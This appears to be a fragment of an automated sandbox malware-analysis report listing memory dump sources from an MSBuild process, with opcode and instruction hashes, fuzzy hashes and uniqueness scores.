                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4e82006378b79a9770644884f48aac63dd893f744f5e8b90eba4bd2defc3a44a
                                                                                                                                • Instruction ID: 01cd70ab284b2c0d46ae4174aba112842e8a31391424dd425dccf77a0d063c4d
                                                                                                                                • Opcode Fuzzy Hash: 4e82006378b79a9770644884f48aac63dd893f744f5e8b90eba4bd2defc3a44a
                                                                                                                                • Instruction Fuzzy Hash: D5011738700108CFCB24DB78D558A6CBBB2EF88255B1540A8E50ACB3A5CF35ED42CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e197e5096674990c8cbc97bdb98f6ad1a217e95d47169d3e2ed63c7aede8ea68
                                                                                                                                • Instruction ID: a08eea24271ca5e606b7342079e7777d9f4d8e741d64514ff3a5a4afb42cc519
                                                                                                                                • Opcode Fuzzy Hash: e197e5096674990c8cbc97bdb98f6ad1a217e95d47169d3e2ed63c7aede8ea68
                                                                                                                                • Instruction Fuzzy Hash: DDF0B4B5900045AFDB04C7A8D884EFBBFBCEBCA715B15C196E048C7017C6349856C7B0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 37ec0011cf32efa910afdc79ce549030ad076875dde991d4986cd68041c5a56b
                                                                                                                                • Instruction ID: 8e728fb46609e42dd61334260c8747af24605ad59ac31f56ad06de48e6ad5c91
                                                                                                                                • Opcode Fuzzy Hash: 37ec0011cf32efa910afdc79ce549030ad076875dde991d4986cd68041c5a56b
                                                                                                                                • Instruction Fuzzy Hash: F8F01D74B00209DFCB45EFB9F98595D7BB9EF84344F5085B8C4049B265DE346E09CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3354407052.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_66d0000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-2843079600
                                                                                                                                • Opcode ID: e5f931a4889170626da56c2bbbb9074fd5d30eff9009dbfdf4c02b80c36702c4
                                                                                                                                • Instruction ID: 1255074014886478345e65813bfbe8a2db99f19536c9142786b719a2fa7a0978
                                                                                                                                • Opcode Fuzzy Hash: e5f931a4889170626da56c2bbbb9074fd5d30eff9009dbfdf4c02b80c36702c4
                                                                                                                                • Instruction Fuzzy Hash: B9122C30E002198FDB64DF69D894A9DB7B2FF88304F208569D40AAB765DB749D85CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3356555829.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_6f30000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: !3
                                                                                                                                • API String ID: 0-668682336
                                                                                                                                • Opcode ID: d6440f706caadf340265e863c7d12221b8282368f694d020402a4043c26dd104
                                                                                                                                • Instruction ID: ec830496c8ddd67ce8d5ca656c08b7afc1ec67098bf423a73513572fd1e82b79
                                                                                                                                • Opcode Fuzzy Hash: d6440f706caadf340265e863c7d12221b8282368f694d020402a4043c26dd104
                                                                                                                                • Instruction Fuzzy Hash: B3F17835E00259CFDB54CFA9C848BADBBF1FF88304F148168E409AB2A5DB75E945CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3314117138.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_3200000_MSBuild.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1554202e825ea88ce32663633b97d700fb6f291777fb5232d5925e66c8be7605
                                                                                                                                • Instruction ID: 432623ba48a9931780e8ad0f35c74813425b99b9eb317aa16615c598f44562ea
                                                                                                                                • Opcode Fuzzy Hash: 1554202e825ea88ce32663633b97d700fb6f291777fb5232d5925e66c8be7605
                                                                                                                                • Instruction Fuzzy Hash: 63230B31D10B1A8ACB11EF68C8945ADF7B1FF99300F15C79AE458B7261EB70AAC5CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%